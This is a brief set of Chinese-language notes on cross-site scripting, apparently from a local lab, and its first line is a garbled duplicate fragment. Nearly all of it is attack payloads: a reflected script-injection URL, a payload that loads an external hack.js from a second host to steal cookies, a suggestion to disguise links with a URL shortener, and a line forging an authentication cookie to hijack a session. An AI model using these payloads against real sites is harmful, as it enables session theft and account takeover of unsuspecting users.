Xss``` // 普通 http://localhost:3000/?from=china // alert尝试 ht

// 普通 
http://localhost:3000/?from=china 
// alert尝试 
http://localhost:3000/?from=<script>alert(3)</script> 
// 获取Cookie 
http://localhost:3000/?from=<script src="http://localhost:4000/hack.js"> </script> 
// 短域名伪造 
https://dwz.cn/ 
// 伪造cookie入侵 chrome 
document.cookie="t8t-auth:token=eyJ1c2VybmFtZSI6Imxhb3dhbmciLCJfZXhwaXJlIjoxNTUzNT Y1MDAxODYxLCJfbWF4QWdlIjo4NjQwMDAwMH0="